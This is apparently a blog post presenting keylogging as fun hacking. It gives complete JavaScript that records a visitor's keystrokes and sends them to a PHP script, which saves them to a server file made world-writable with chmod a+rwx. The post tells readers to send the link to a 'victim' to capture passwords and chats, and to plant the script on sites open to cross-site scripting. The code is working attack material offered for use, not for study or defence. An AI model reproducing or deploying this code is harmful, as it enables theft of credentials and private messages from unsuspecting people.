Key loggers are very funny and my favourite way of hacking. So in this article we are going to take look at how send a link to someone who you needed to attack, take his/ her key logs / Passwords / what's he/she chatting by just sending a ling to the victim.
For this we are using java scripts which is run on client side and php which is going to run on server side. So this is the setup,
Firstly we are creating two pages. One is html page which we are going to include our java script and the other is php page which is going to save all the key logs return from the remote victim. After we created those two pages we are sending the link to our html page to the victim. When the victims go to that link and when he is typing all key logs going to be saved on our server.
So here is the java script which you need to include in html page.
----------------------------------------------------------------------------------------------------------
<html>
<script lang=javascript type=text/javascript>
var buffer = [];
var attacker = '/k.php?c='
document.onkeypress = function(e) {
var timestamp = Date.now() | 0;
var stroke = {
k: e.key,
t: timestamp
};
buffer.push(stroke);
}
window.setInterval(function() {
if (buffer.length > 0) {
var data = encodeURIComponent(JSON.stringify(buffer));
new Image().src = attacker + data;
buffer = [];
}
}, 200);
</script>
<html>
---------------------------------------------------------------------------------------------------------
Here is the php code which is going to save the key logs on the 'data.txt' in /home/user/Documents/test/ directory.
---------------------------------------------------------------------------------------------------------
<?php
error_reporting(E_ALL);
ini_set('display_errors',1);
if(!empty($_GET['c'])) {
$logfile = fopen('/home/user/Documents/test/data.txt', 'a+');
fwrite($logfile, $_GET['c']);
fclose($logfile);
}
?>
----------------------------------------------------------------------------------------------------------
And there is a important thing. Because in the fopen function the file is write in append mode (a+) we have to create data.txt file in that directory. And the very important thing is after we created the data.txt we should modify the permission of the file to read, write and execute for all users by running following command.
sudo chmod a+rwx /home/user/Documents/test/data.txt
So have a fun with this.
And this can put into the sites which are vulnerable for cross-site scripting.
No comments:
Post a Comment